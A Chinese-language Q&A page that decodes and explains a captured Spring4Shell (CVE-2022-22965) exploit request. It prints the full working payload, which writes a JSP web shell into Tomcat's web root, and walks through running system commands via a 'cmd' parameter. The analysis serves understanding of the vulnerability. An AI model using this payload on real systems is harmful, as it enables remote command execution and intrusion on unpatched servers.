You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Spring4shell payload解析请求:解码后payload的RCE原理及代码解读

Spring4Shell Payload 执行原理解析

先把你抓到的完整payload解码后整理成清晰格式:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i
&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

核心逻辑拆解

Spring4Shell(CVE-2022-22965)本质是利用Spring框架DataBinder的权限校验漏洞,让攻击者能直接篡改Tomcat容器里的AccessLogValve(访问日志阀门)配置,最终写入可执行的恶意JSP文件,拿到远程命令执行权限。

各参数作用详解

  • pattern参数:这是整个payload的核心,用来设置AccessLogValve的日志输出格式。这里填的不是普通日志模板,而是一段嵌入的JSP代码:
    %{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i
    
    其中%{prefix}i和%{suffix}i是占位符,会被补全成JSP的标准开头结尾,最终这段代码的功能是:接收URL里的cmd参数,执行对应的系统命令,把命令输出结果打印出来。
  • suffix=.jsp:指定生成的文件后缀为.jsp,确保Tomcat能识别并执行这个文件。
  • directory=webapps/ROOT:指定文件写入路径,webapps/ROOT是Tomcat默认的Web应用根目录,写入这里的文件可以直接通过域名/IP加文件名访问。
  • prefix=shell:设置生成文件的前缀,结合空的fileDateFormat,最终生成的文件名就是shell.jsp。
  • fileDateFormat=:留空是为了避免日志文件自动添加日期后缀,保证生成的文件名固定为shell.jsp,方便后续访问。

完整攻击流程

  1. 攻击者发送包含上述参数的恶意请求,Spring的DataBinder组件没拦住,让攻击者成功修改了Tomcat的AccessLogValve配置。
  2. 当有后续请求触发日志记录时,AccessLogValve会按照pattern里的内容生成“日志”——也就是那段恶意JSP代码。
  3. 这段“日志”被写入到webapps/ROOT/shell.jsp文件中。
  4. 攻击者直接访问http://目标IP/shell.jsp?cmd=xxx(比如cmd=whoami),Tomcat解析执行这个JSP文件,执行系统命令并返回结果,完成远程命令执行。

内容的提问来源于stack exchange,提问作者Beginner NOOB

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.06.26 19:04:58